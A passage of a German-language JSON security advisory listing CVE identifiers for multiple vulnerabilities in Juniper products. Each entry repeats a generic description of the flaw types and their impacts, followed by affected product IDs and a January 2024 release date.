Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2024-21594" }, { "cve": "CVE-2024-21591", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2024-21591" }, { "cve": "CVE-2024-21589", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2024-21589" }, { "cve": "CVE-2024-21587", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2024-21587" }, { "cve": "CVE-2024-21585", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2024-21585" }, { "cve": "CVE-2023-38802", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-38802" }, { "cve": "CVE-2023-38408", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-38408" }, { "cve": "CVE-2023-3817", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-3817" }, { "cve": "CVE-2023-36842", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-36842" }, { "cve": "CVE-2023-3446", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-3446" }, { "cve": "CVE-2023-3341", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-3341" }, { "cve": "CVE-2023-32360", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-32360" }, { "cve": "CVE-2023-32067", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-32067" }, { "cve": "CVE-2023-2828", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-2828" }, { "cve": "CVE-2023-2650", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-2650" }, { "cve": "CVE-2023-26464", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-26464" }, { "cve": "CVE-2023-24329", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-24329" }, { "cve": "CVE-2023-23920", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-23920" }, { "cve": "CVE-2023-23918", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-23918" }, { "cve": "CVE-2023-23454", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-23454" }, { "cve": "CVE-2023-22809", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-22809" }, { "cve": "CVE-2023-2235", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2023-2235" }, { "cve": "CVE-2023-22081", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code 